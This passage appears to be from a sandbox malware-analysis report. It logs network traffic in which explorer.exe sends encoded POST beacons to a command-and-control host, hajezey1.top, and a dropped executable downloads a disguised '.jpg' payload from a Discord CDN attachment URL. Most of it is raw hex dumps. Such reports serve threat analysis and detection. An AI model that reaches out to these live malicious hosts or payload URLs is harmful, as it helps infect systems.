Oct 29, 2021 20:49:30.827368021 CEST	1091	IN	Data Raw: 09 3d 00 88 5d c6 b0 13 d1 3f 01 96 a0 9d 36 87 0d 3d 00 6f da 4a 13 56 d1 3f 4a 8e f3 20 b2 62 05 3d 00 27 34 f4 88 98 d1 3f 2f b5 90 74 de 3e e1 3c 00 77 ed 1a 12 db d1 3f 61 eb 60 cc d6 d7 f8 3c 00 a3 5f 18 af 1d d2 3f 1f 61 dd 09 ae 65 07 3d Data Ascii: =]?6=oJV?J b='4?/t><w?a`<_?ae=F``?/f=#&?5SmT4<W?Rz< (?vY<k?pY.=y?8'<KuC?j<{=2<5?d=x?"a=@ic?%[9=
Oct 29, 2021 20:49:30.827387094 CEST	1092	IN	Data Raw: 05 f1 6f 50 eb 40 14 3d 00 b0 da 59 ea 15 e8 3f e2 7f b1 cf bf 03 09 3d 00 07 01 84 0c 6e e8 3f 75 cd d0 98 3f b3 1b 3d 00 25 92 6b 19 c7 e8 3f 5a 45 4d 2d 27 5e 10 3d 00 10 44 54 1b 21 e9 3f 3a 5a c2 ca 6e 3d 1a 3d 00 b7 f5 30 1d 7c e9 3f 07 d0 Data Ascii: oP@=Y?=n?u?=%k?ZEM-'^=DT!?:Zn==0\|?O=*?m}I{=eP5?+}ZI=Q?^oc;<'?u/r<S?i1=q?/={ss?VV&=#k~?[<?vB<6#M?
Oct 29, 2021 20:49:30.880199909 CEST	1094	IN	Data Raw: 93 11 5c 25 ef 3f 66 2c ce f3 91 21 ef 3f ea b0 b8 25 bf 1d ef 3f 4e 0e 1f a4 e3 19 ef 3f 24 08 c4 6b ff 15 ef 3f 80 6f 61 79 12 12 ef 3f 2a 14 a8 c9 1c 0e ef 3f 9c b5 3f 59 1e 0a ef 3f cd f3 c6 24 17 06 ef 3f c2 3f d3 28 07 02 ef 3f ee cb f0 61 Data Ascii: \%?f,!?%?N?$k?oay?*??Y?$??(?a?9y?99R?%R?F?@I?j T?0<?2j?p~?,L?@_o?7?'?VG?D<xZu?`\@j?)]Gq`?LcU?JupJ?CY

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49769	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:33.220673084 CEST	1448	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uktwknfaq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: hajezey1.top
Oct 29, 2021 20:49:33.220690966 CEST	1448	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 1b d1 a9 28 Data Ascii: 6152Ek\lwmwu$f]d(;ijRO0TOTg\|tq2f"zl:fe
Oct 29, 2021 20:49:33.294075012 CEST	1449	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49770	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:33.378335953 CEST	1450	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fnyhcr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: hajezey1.top
Oct 29, 2021 20:49:33.378353119 CEST	1450	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 12 b3 ad 20 Data Ascii: 6152Ek\lwmwu$f]d &}w/Lu"/e'i5Ie'Im?H(GJZ<.YiMw$i?I9H+^"ae&3I3K'9}t;ta:F8u<KA
Oct 29, 2021 20:49:33.462199926 CEST	1450	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49800	162.159.130.233	443	C:\Users\user\AppData\Local\Temp\69B.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-29 18:49:59 UTC	0	OUT	GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2021-10-29 18:50:00 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:49:59 GMT Content-Type: image/jpeg Content-Length: 1023400 Connection: close CF-Ray: 6a5e9645dead697f-FRA Accept-Ranges: bytes Age: 33759 Cache-Control: public, max-age=31536000 ETag: "4c1a9946a2a50a9bee099f80736b83cb" Expires: Sat, 29 Oct 2022 18:49:59 GMT Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635499591138366 x-goog-hash: crc32c=ewuz5A== x-goog-hash: md5=TBqZRqKlCpvuCZ+Ac2uDyw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 1023400 X-GUploader-UploadID: ADPycdvJxlr9khbKEXfSQ9n_bxglLL7dSGVIxF6rk63UtNA6boJtNKCUIT3dV9e0Gr4n6Y4UdNwOh6zGJyRPl1vLRno X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Aeou2uY3nXx6OmcMRe%2BN%2Fzm5U%2Bh9JEWEbVZj%2FqnL8UYTAR16HsFVci8S3eEVsGBGHaRmMpwUsV9WmJFXRyAvQQd9BT6oZ2h%2FxLPodtf7Xw9k%2B9w%2BqyN4YDD2HDGAZ194E3vj6g%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-10-29 18:50:00 UTC	1	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-10-29 18:50:00 UTC	1	IN	Data Raw: 4f 71 4a 70 6d 57 44 45 58 4d 2d 45 45 20 4d 4f 20 71 6d 6d 20 4f 20 70 20 4f 20 4f 20 4f 20 6d 20 4f 20 4f 20 4f 20 4a 57 57 20 4a 57 57 20 4f 20 4f 20 71 58 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 44 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 71 4a 58 20 4f 20 4f 20 4f 20 71 6d 20 70 71 20 71 58 44 20 71 6d 20 4f 20 71 58 4f 20 4d 20 4a 4f 57 20 70 70 20 71 58 6d 20 71 20 45 44 20 4a 4f 57 20 70 70 20 58 6d 20 71 4f 6d 20 71 4f 57 20 71 71 57 20 70 4a 20 71 71 4a 20 71 71 6d 20 71 71 71 20 71 4f 70 20 71 71 6d 20 4d 45 20 71 4f 4d 20 70 4a 20 4d 4d 20 4d 45 20 71 71 4f 20 71 Data Ascii: OqJpmWDEXM-EE MO qmm O p O O O m O O O JWW JWW O O qXm O O O O O O O Dm O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O qJX O O O qm pq qXD qm O qXO M JOW pp qXm q ED JOW pp Xm qOm qOW qqW pJ qqJ qqm qqq qOp qqm ME qOM pJ MM ME qqO q
2021-10-29 18:50:00 UTC	2	IN	Data Raw: 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4a 57 20 6d 4f 20 4a 4a 4d 20 71 4f 4d 20 71 71 57 20 57 4f 20 6d 58 20 57 4f 20 57 4f 20 58 6d 20 71 71 6d 20 71 71 45 20 71 6d 44 20 71 6d 70 20 57 4f 20 6d 58 20 71 70 58 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 4a 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 45 44 20 57 4f 20 57 6d 20 58 6d 20 71 4a 6d 20 Data Ascii: O O O O O O O O O O O O O O JW mO JJM qOM qqW WO mX WO WO Xm qqm qqE qmD qmp WO mX qpX Wm Xm qqm qqE qOM qqJ WO qqJ WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO qED WO Wm Xm qJm
2021-10-29 18:50:00 UTC	4	IN	Data Raw: 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 20 57 6d 20 58 6d 20 71 58 20 4d 71 20 70 71 20 70 20 44 6d 20 58 70 20 57 4f 20 57 6d 20 58 6d 20 71 45 58 20 71 71 58 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 6d 4f 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 4d 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 57 70 20 71 4f 4d 20 71 71 4a 20 71 71 6d 20 70 4f 20 44 6d 20 58 70 20 57 44 20 4a 4d 20 4a 4a 20 71 4f 4d 20 71 71 4a 20 44 4a 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 6d Data Ascii: Wq Wm Xm qqX qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX qX Wm Xm qX Mq pq p Dm Xp WO Wm Xm qEX qqX qOM qqJ WO JmO Wq Wm Xm qqX qqE qOM qqJ qMO mM WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm Wp qOM qqJ qqm pO Dm Xp WD JM JJ qOM qqJ DJ mX WO Wm Xm qm
2021-10-29 18:50:00 UTC	5	IN	Data Raw: 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 Data Ascii: m qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm q
2021-10-29 18:50:00 UTC	6	IN	Data Raw: 58 6d 20 71 71 6d 20 57 20 70 71 20 6d 71 20 57 4f 20 6d 58 20 44 44 20 45 4a 20 45 6d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 58 58 20 6d 57 20 6d 58 20 57 4f 20 44 4f 20 4a 6d 44 20 58 45 20 4d 58 20 70 71 20 71 20 57 4f 20 6d 58 20 44 44 20 44 58 20 4a 57 71 20 71 71 6d 20 71 71 45 20 4a 4d 20 71 6d 20 6d 6d 20 6d 58 20 57 4f 20 44 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 71 6d 6d 20 4a 71 20 6d 4a 20 44 58 20 71 6d 45 20 71 71 6d 20 71 71 45 20 4a 4d 20 4a 20 57 70 20 6d 4d 20 57 4f 20 45 4f 20 6d 4a 20 71 4f 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 6d 45 20 57 4f 20 57 6d 20 4d 6d 20 4a 4f 58 20 4d 70 20 71 70 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 4a 4a 20 58 6d 20 71 71 6d 20 71 4a 45 20 4d 45 20 45 4a 20 57 Data Ascii: Xm qqm W pq mq WO mX DD EJ Em qqm qqE qOp XX mW mX WO DO JmD XE MX pq q WO mX DD DX JWq qqm qqE JM qm mm mX WO DO qJm qOM qqE qOM qJJ qmm Jq mJ DX qmE qqm qqE JM J Wp mM WO EO mJ qOX qqE qOM qJJ JD mE WO Wm Mm JOX Mp qpp qqJ WO Wm Mp JJ Xm qqm qJE ME EJ W
2021-10-29 18:50:00 UTC	8	IN	Data Raw: 45 20 4d 45 20 57 57 20 70 70 20 57 6d 20 4a 4f 4f 20 58 4a 20 71 44 6d 20 71 71 44 20 71 4f 4d 20 71 71 58 20 44 57 20 70 4f 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 20 71 70 4d 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 71 20 70 71 20 70 70 20 71 71 6d 20 71 4a 20 71 6d 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 4f 44 20 57 4a 20 4a 70 57 20 58 57 20 71 71 6d 20 71 71 57 20 70 4f 20 4d 57 20 57 4f 20 6d 58 20 57 44 20 71 4d 20 4a 71 4a 20 71 6d 4f 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 57 71 20 57 4f 20 57 6d 20 71 4a 45 20 4a 4d 20 4d 57 20 71 4f 58 20 71 71 4a 20 57 4a 20 70 70 20 57 57 20 70 4d 20 58 4f 20 71 6d 4f 20 71 71 57 20 71 58 44 20 71 71 70 20 57 4f 20 57 6d 20 44 57 20 44 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4d 20 71 6d 70 20 57 4f 20 6d Data Ascii: E ME WW pp Wm JOO XJ qDm qqD qOM qqX DW pO WO Wm Mm qJ qpM qOM qqJ Wm Jq pq pp qqm qJ qmJ qOM qqJ Wm JOD WJ JpW XW qqm qqW pO MW WO mX WD qM JqJ qmO qqE qOM qqD JD Wq WO Wm qJE JM MW qOX qqJ WJ pp WW pM XO qmO qqW qXD qqp WO Wm DW D Xm qqm qJE qM qmp WO m
2021-10-29 18:50:00 UTC	9	IN	Data Raw: 4f 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 70 20 57 70 20 57 6d 20 44 70 20 4a 70 57 20 71 4a 45 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 57 44 20 57 4f 20 57 6d 20 58 4a 20 71 4a 44 20 71 71 6d 20 70 4f 20 4a 71 4d 20 57 4f 20 6d 58 20 57 4a 20 70 45 20 58 4f 20 4d 4d 20 71 71 70 20 71 71 70 20 4a 57 70 20 71 4f 6d 20 6d 58 20 57 4f 20 57 57 20 71 71 70 20 71 44 4a 20 4a 4a 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 70 57 20 58 6d 20 71 71 6d 20 71 71 57 20 45 57 20 71 4f 4a 20 70 70 20 57 70 20 71 4f 20 4a 70 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 70 4f 20 57 4d 20 57 71 20 6d 58 20 57 4a 20 70 45 20 58 4a 20 4d 4d 20 71 71 57 20 71 4a Data Ascii: O qqm qqE qOp Mp Wp Wm Dp JpW qJE qqW qqE qOM qqm JD WD WO Wm XJ qJD qqm pO JqM WO mX WJ pE XO MM qqp qqp JWp qOm mX WO WW qqp qDJ JJJ qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX Mp qpW Xm qqm qqW EW qOJ pp Wp qO Jpm Xm qqm qqE pO WM Wq mX WJ pE XJ MM qqW qJ
2021-10-29 18:50:00 UTC	10	IN	Data Raw: 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 44 71 20 6d 58 20 57 4f 20 57 57 20 45 4d 20 44 44 20 71 71 57 20 71 4f 4d 20 57 4a 20 6d 58 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 4f 4f 20 70 4f 20 45 4d 20 57 4f 20 6d 58 20 57 44 20 44 4f 20 58 44 20 71 71 71 20 4a 6d 58 20 57 57 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 4a 70 4f 20 71 6d 4f 20 71 71 6d 20 71 71 45 20 71 4f 57 20 58 58 20 57 20 6d 58 20 57 4f 20 44 4f 20 70 4d 20 45 6d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 4d 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 71 20 71 71 6d 20 44 4d 20 45 6d 20 57 4f 20 6d 58 20 57 44 20 4a 45 20 58 70 20 71 71 44 20 71 4a 4f 20 71 45 44 20 4d 44 20 6d 58 20 6d 58 20 57 4f 20 57 4a 20 71 4a 6d 20 71 4a 4a 20 71 71 45 20 71 4f 4d 20 71 71 58 20 44 4a 20 Data Ascii: qqE qOM qqJ Dq mX WO WW EM DD qqW qOM WJ mX mX WO Wp Xm qqm qOO pO EM WO mX WD DO XD qqq JmX WW qqJ WO mM Jp JpO qmO qqm qqE qOW XX W mX WO DO pM Em qqE qOM qJJ JD M WO Wm Mm qJq qqm DM Em WO mX WD JE Xp qqD qJO qED MD mX mX WO WJ qJm qJJ qqE qOM qqX DJ
2021-10-29 18:50:00 UTC	12	IN	Data Raw: 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4d 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 45 4a 20 57 71 20 6d 58 20 57 4a 20 70 4d 20 58 70 20 4d 4d 20 71 71 70 20 71 4a 6d 20 71 71 45 20 6d 57 20 44 70 20 71 4d 71 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 44 4f 20 71 57 57 20 6d 58 20 57 4f 20 57 4f 20 71 4a 6d 20 44 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 44 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 4a 71 45 20 71 4f 4d 20 71 71 4a 20 57 4a 20 57 44 20 4a 44 20 6d 58 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 20 45 6d 20 57 71 20 6d 58 20 57 4a 20 70 4d 20 58 70 20 4d 45 20 71 71 57 20 71 4a 6d 20 71 71 58 20 4d 70 20 57 20 57 71 20 57 6d 20 58 4a 20 71 4f 4f Data Ascii: D DE qO Wm Xm qJO JD qMp qqJ WO Wm Mp qp Xm qqm qJE J EJ Wq mX WJ pM Xp MM qqp qJm qqE mW Dp qMq qOX Xm qqm qqD EJ qDO qWW mX WO WO qJm DM qqE qOM qJJ DW X WO Wm Mm JM JqE qOM qqJ WJ WD JD mX Xm qqm qqW J Em Wq mX WJ pM Xp ME qqW qJm qqX Mp W Wq Wm XJ qOO
2021-10-29 18:50:00 UTC	13	IN	Data Raw: 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4d 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4a 44 20 71 71 4d 20 70 57 20 57 57 20 6d 70 20 71 58 45 20 71 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 71 57 4d 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 6d 57 20 71 71 4a 20 57 4f 20 57 58 20 70 71 20 6d 71 20 44 4d 20 71 71 45 20 71 4f 58 20 4a 4a 6d 20 6d 4a 20 57 4f 20 6d 58 20 57 71 20 71 4d 20 71 70 4a 20 71 6d 6d 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 45 20 57 4f 20 57 6d 20 4d 6d 20 71 20 45 45 20 71 4f 4d 20 71 71 4a 20 57 44 20 4d 57 20 71 Data Ascii: OM qqJ WD DE qO Wm Xm qJO JD qMp qqJ WO Wm Mp qp Xm qqm qJE qJD qqM pW WW mp qXE qm qqm qqE qOX XW JJD qWM WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD mW qqJ WO WX pq mq DM qqE qOX JJm mJ WO mX Wq qM qpJ qmm qqE qOM qqD JD E WO Wm Mm q EE qOM qqJ WD MW q
2021-10-29 18:50:00 UTC	14	IN	Data Raw: 4a 4f 20 4a 57 70 20 71 4f 6d 20 6d 58 20 57 4f 20 57 57 20 71 71 70 20 71 44 4a 20 71 57 45 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 57 6d 20 58 6d 20 71 71 6d 20 71 71 57 20 71 4f 71 20 58 58 20 57 4a 20 6d 58 20 57 4f 20 6d 58 20 70 58 20 71 20 71 71 4d 20 71 4f 4d 20 4f 20 45 44 20 6d 44 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 71 4f 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 57 20 57 70 20 44 4d 20 71 44 20 71 71 57 20 71 71 45 20 71 4f 45 20 4d 4d 20 57 58 20 70 70 20 57 58 20 70 4d 20 58 4f 20 4d 4d 20 71 71 4a 20 71 71 6d 20 71 4a 6d 20 71 4d 71 20 71 4f 44 20 57 4f 20 57 6d 20 58 57 20 58 45 20 71 44 57 20 4a 4f 70 20 71 71 4a 20 57 4f 20 57 4a 20 4a 44 Data Ascii: JO JWp qOm mX WO WW qqp qDJ qWE qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX Mp qWm Xm qqm qqW qOq XX WJ mX WO mX pX q qqM qOM O ED mD WO Wm Mm JM qOD qOM qqJ WD pW Wp DM qD qqW qqE qOE MM WX pp WX pM XO MM qqJ qqm qJm qMq qOD WO Wm XW XE qDW JOp qqJ WO WJ JD
2021-10-29 18:50:00 UTC	16	IN	Data Raw: 6d 57 20 71 20 71 20 57 45 20 58 45 20 4d 4f 20 44 4a 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4f 20 4a 44 20 6d 4f 20 58 6d 20 71 71 6d 20 71 71 57 20 71 4f 70 20 4d 71 20 44 4f 20 57 4f 20 70 44 20 70 6d 20 71 4a 6d 20 58 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 4d 70 20 71 71 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 4f 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 4a 20 4a 58 20 58 57 20 4d 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 6d 20 57 4f 20 70 20 71 71 71 20 71 71 6d 20 71 71 58 20 4d 58 20 71 71 4a 20 57 4f 20 6d 4d 20 70 70 20 44 20 58 44 20 71 71 6d 20 58 4a 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 57 20 57 4f 20 57 6d 20 44 4d 20 71 4f 71 20 71 4a 45 20 71 71 71 20 70 71 20 71 4a 44 20 6d 58 20 57 4f 20 44 4f 20 4d 57 20 58 Data Ascii: mW q q WE XE MO DJ qOM qqJ WD WO JD mO Xm qqm qqW qOp Mq DO WO pD pm qJm Xm qqE qOM qqX Mp qq WO Wm Mm qJO qEq qqO XD JpD mX WJ JX XW MX qqE qOM qqJ WO Wm WO p qqq qqm qqX MX qqJ WO mM pp D XD qqm XJ qOM qqJ WO WW WO Wm DM qOq qJE qqq pq qJD mX WO DO MW X
